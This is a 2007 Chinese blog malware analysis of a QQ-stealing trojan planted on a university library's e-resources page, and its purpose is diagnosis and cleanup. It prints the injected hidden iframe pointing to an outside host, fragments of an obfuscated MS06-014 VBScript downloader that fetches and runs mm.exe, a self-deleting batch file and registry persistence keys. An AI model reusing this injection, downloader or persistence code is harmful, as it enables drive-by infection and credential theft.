病毒分析 订阅所有病毒分析的日志

"窥探"图书馆电子资源主页的木马"妹妹"

作者:admin 日期:2007-01-21

字体大小:
近日需要查几篇文献,也想去看看华农图书馆主页那个该死的病毒还在不?从上学期开始只要进入图书馆主页卡巴就杀猪般狂叫,检测到某某木马.今日一来,哈哈,我的卡巴不叫了,一看源程序,也没了那个框架,看来还有人管事.到电子资源去找几篇文章吧,"嘎嘎".猪声又起,江湖依旧.四面楚歌,悲凉至极.电子资源可能是图书馆被游览的最多的网页吧,那可是盗QQ的木马啊,如果没有打补丁.不知道又有多少人欲哭无泪,惨不忍睹了!
废话少说,开始了....
中毒现象
查看在%ProgramFiles%\Internet Explorer\Connection Wizard是否有isignup.dll,isignup.sys;如果没有打开IE,而进程里是否有ieplorer.exe在运行;运行-msconfig,是否有kwatlog.exe的存在,如果是那就十之八九中了,另外这个家伙很耗内存,,所以这个木马没前途.
点击放大图片
"偷窥"妹妹
打开图书馆电子资源页面http://web.scau.edu.cn/tsg/elect/index.htm.只看见状态栏在"翻江倒海",与图书馆电子资源页面无关的网页在一一隐藏打开,这时进入%userprofile%\Local Settings\Temporary Internet Files,你会看见这些东东与scau是无关的,
点击放大图片

扫下先.p1.htm:Trojan.DL.VBS.Psyme.ce;p1.htm:Trojan.DL.VBS.Agent.r,笨蛋,一个都不免杀.

记事本打开http://web.scau.edu.cn/tsg/elect/index.htm,在源代码末尾加入了
程序代码 程序代码
..
<iframe src='http://www.yxgm78.com/yx.htm' width='0' height='0' scrolling='no' frameborder='0'></iframe>

打开yx.htm源代码
程序代码 程序代码

...
<frame src="wz.htm" framborder="no" scrolling="auto" noresize marginwidth="0" margingheight="0">
<frame src="wu.htm"  frameborder="no" scrolling="no"   noresize marginwidth="0" margingheight="0">
</frameset>
<script language="javascript" type="text/javascript" src="http://js.users.51.la/636252.js"></script>
...

卑鄙,还用"我要拉"统计有多少人中马.
继续打开wz.htm,wu.htm
程序代码 程序代码
<iframe src="p1.htm" width="0" height="0" border="0"></iframe>
<iframe src="p2.htm" width="0" height="0" border="0"></iframe>

go on
p1.htm
程序代码 程序代码
<script>xinchunkuaile = "http://www.yxgm78.com/mm/mm.exe"t="32,32,32,32,加密的
^_^,首先祝您新春快乐,看到没,
p2.htm
程序代码 程序代码
<script language="VBScript">    on error resume next Laoding ="http://www.yxgm78.com/mm/mm.exe"Set df = document.createElemen("ob"&Tr4c3&"jec"&Tr4c3&"t") df.setAttribute

     咋这么眼熟啊,仔细瞧瞧,嘎嘎,这不是经典的“ms06014网页木马”吗?晕,现在ms06014网页木马生成器是满天飞啊!看看有没有"MyQQ5372453",^_^,被换成"Laoding "了.网页被加密可能为了躲避杀毒软件,加密了部分代码.嘻嘻,就是http://www.yxgm78.com/mm/mm.exe么没加密.我要的就是你.
    这家伙还真是麻烦,转了这么多弯才进入正题.并且还来个双保险,用2个下载者(p1.htm,p2.htm)搭配,以免妹妹(mm.exe)下不下来,并用"我要拉"统计中马的数量.今天一早就起来看这些玩儿,也没把P1.htm加密的网页解码出来,只知道好像是VBS加密了.如果不加密可能就不知道利用的什么漏洞,补丁就不知道是什么了,哪位仁兄找到了,告诉一声啊;P2.htm则利用ms06014漏洞来下载运行mm.exe.打好相关补丁(附件里有传或去微软下载)就OK.罗唆一句,网上那些测试是否有ms06014漏洞的网页不要乱点!
12点了,啃个鸡腿,听听歌先.
对面的女孩看过来,看过来,看过来,这里的表演很精彩.......
好了,现在就要好好研究这个"妹妹"(mm.exe)了.先DOWNLOAD,哇,5KB,就是传说中的5k下载者吧.扫下先,是trojan-downloader.win32.small.edz.
启动"妹妹",mm.exe启动IE并修改IE内存,插入IE过防火墙,难怪我没看见防火墙警告消息,^_^
下载
程序代码 程序代码
%userprofile%\Local Settings\Temp\mh.exe

copy mh.exe到%WINDOWS%\system32\mh.exe
mh.exe释放
程序代码 程序代码

%ProgramFiles%\Internet Explorer\Connection Wizard\isignup.dll
%ProgramFiles%\Internet Explorer\Connection Wizard\isignup.sys

这2个就是盗QQ的.
之后加载驱动isignup.sys,添加ShellExecuteHooks启动项
程序代码 程序代码
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]"{B8A170A8-7AD3-4678-B2FE-F2D7381CC1B5}"=""

添加注册表键值
程序代码 程序代码

[HKEY_CLASSES_ROOT\CLSID\{B8A170A8-7AD3-4678-B2FE-F2D7381CC1B5}\InProcServer32]@="C:\\Program Files\\Internet Explorer\\Connection Wizard\\isignup.sys""ThreadingModel"="Apartment"



isignup.sys注入explorer.exe,实现随桌面启动;
下载verclsid.exe,rx.exe和_xiaran.bat到C:\WINDOWS\system32

启动rx.exe
程序代码 程序代码

%userprofile%\Local Settings\Temp\wanpacket.dll
%userprofile%\Local Settings\Temp\packet.dll
%userprofile%\Local Settings\Temp\npptools.dll
%userprofile%\Local Settings\Temp\npf.sys
%userprofile%\Local Settings\Temp\ kwatlog.exe
%ProgramFiles%\Internet Explorer\Connection Wizard\icwres.ocx
%WINDOWS%\system32\CatRoot2\tmp.edb



反复添加注册表键值
程序代码 程序代码
[HKLM\SYSTEM\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations"="
        \??\C:\Program Files\Internet Explorer\Connection Wizard\icwres.ocx
         !\??\C:\Program Files\Internet Explorer\Connection Wizard\isignup.sys"


mh.exe进程执行_xiaran.bat,删除自身,
代码如下:
程序代码 程序代码
:try
del "C:\WINDOWS\system32\mh.exe"
if exist "C:\WINDOWS\system32\mh.exe" goto try
del %0

d.bat与_xiaran.bat功能相似,不过是删除mm.exe


rx.exe启动kwatlog.exe,
释放
程序代码 程序代码

%userprofile%\Local Settings\Temp\h4qrb9v.sys
%userprofile%\Local Settings\Temp\h4c.dll
%userprofile%\Local Settings\Temp\_wpcap_.bat
%userprofile%\Local Settings\Temp\_wpcap_.inf
%WINDOWS%\system32\wincab.sys
%WINDOWS%\system32\tpxhst32


添加自启动
程序代码 程序代码

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"
"svc"="C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\kwatlog.exe"


_wpcap_.bat启动_wpcap_.inf,安装名为Netgroup Packet Filter服务,copy npf.sys %SYSTEMROOT%\system32\drivers\.
_wpcap_.inf
程序代码 程序代码

Signature="$WINDOWS NT$"
[DefaultInstall.Services]
AddService=NPF,,winpcap_svr
[winpcap_svr]
DisplayName=Netgroup Packet Filter
ServiceType=0x1
StartType=3
ErrorControl=1
ServiceBinary=%12%\npf.sys

_wpcap_.bat
程序代码 程序代码
rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 %CD%\_wpcap_.inf
del _wpcap_.inf
copy npf.sys %SYSTEMROOT%\system32\drivers\
del npf.sys
del %0


最后添加tpxhst32到自启动,
程序代码 程序代码
[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"C:\\WINDOWS\\system32\\tpxhst32.exe"="tpxhst32"


清除办法
如果你会用冰刃,很容易就发现会马脚,
隐藏进程和驱动点击放大图片

危险进程
点击放大图片
kwatlog和isignup.dll就是"祸首'


1, 删除下列文件
程序代码 程序代码
%WINDOWS%\system32\tpxhst32.exe
%WINDOWS%\system32\verclsid.exe
%WINDOWS%\system32\drivers\npf.sys
%WINDOWS%\system32\drivers\squell.sys
%ProgramFiles%\Internet Explorer\Connection Wizard\isignup.dll
%ProgramFiles%\Internet Explorer\Connection Wizard\isignup.sys
%ProgramFiles%\Internet Explorer\Connection Wizard\icwres.ocx
清空%userprofile%\Local Settings\Temp\


2,删除下列键值
程序代码 程序代码

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"svc"="C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\kwatlog.exe"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"C:\\WINDOWS\\system32\\tpxhst32.exe"="tpxhst32"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]"{B8A170A8-7AD3-4678-B2FE-F2D7381CC1B5}"=""
[HKEY_CLASSES_ROOT\CLSID\{B8A170A8-7AD3-4678-B2FE-F2D7381CC1B5}\InProcServer32]@="C:\\Program Files\\Internet Explorer\\Connection Wizard\\isignup.sys""ThreadingModel"="Apartment"

3,在注册表查找tpxhst32.exe,kwatlog.exe,删除所有相关值

kwatlog.exe以隐藏进程启动,隐蔽性很好,进程管理器是看不到的.
点击放大图片
最后把我截获的程序截图纪念一下,下载文件 图书馆电子资源主页木马相关程序下载
!
点击放大图片


分析补充
p1.htm中的t值时ASCII字符,解码后为
<html>
    <script language="VBScript">
    on error resume next
    Fpingpinganan="o"&"b"&"j"&"e"&"ct"
    Kpingpinganan="c"&"l"&"a"&"s"&"s"&"i"&"d"
    Tpingpinganan="c"&"l"&"s"&"id"&":"&"B"&"D"&"96"&"C"&"556"&"-"&"6"&"5"&"A"&"3-"&"11"&"D"&"0"&"-"&"98"&"3"&"A"&"-"&"00"&"C"&"04"&"FC"&"29"&"E"&"36"
    Mpingpinganan="M"&"i"&"cr"&"oso"&"f"&"t"&"."&"X"&"M"&"L"&"HTTP"
   Vpingpinganan="S"&"he"&"l"&"l"&"."&"A"&"pp"&"l"&"i"&"c"&"a"&"t"&"i"&"on"
Wpingpinganan="S"&"c"&"r"&"ip"&"ti"&"n"&"g"&"."&"F"&"i"&"l"&"e"&"S"&"y"&"s"&"t"&"e"&"m"&"O"&"b"&"j"&"e"&"c"&"t"
    Set xinchunkuailec = document.createElement(Fpingpinganan)
其利用的也是ms06014漏洞,故而打上WindowsXP-KB911562-x86-CHS补丁就行了。


下载文件 WindowsXP-KB911562-x86-CHS(ms06014补丁,重要!!)

以下说明属本文之一部分:
转载请保持完整并注明:转自 金刀客[www.daokers.com]


[本日志由 admin 于 2009-05-06 02:45 PM 编辑]
相关日志:
在线RSS阅读器订阅:
feedsky
抓虾 pageflakes Rojo google reader
my yahoo newsgator bloglines 有道
鲜果 飞豆 哪吒 Netvibes
Netvibes Netvibes

手机订阅:

本站订阅地址:
RSS2:点击复制
Atom:点击复制
        本站所有原创文章均遵循 [创作共用协议]
        本站原创文章可以转载,但须保持完整性并注明出处。
        COPYRIGHT 2008-2010  §  HTTP://WWW.DAOKERS.COM  §    ALL RIGHTS
评论: 0 | 引用: 0 | 查看次数: -
发表评论
昵 称:
密 码: 游客发言不需要密码.
验证码: 验证码提示:单击自动获取验证码
内 容:
最多可输入,当前共,还可输入
选 项:
虽然发表评论不用注册,但是为了保护您的发言权,建议您注册帐号.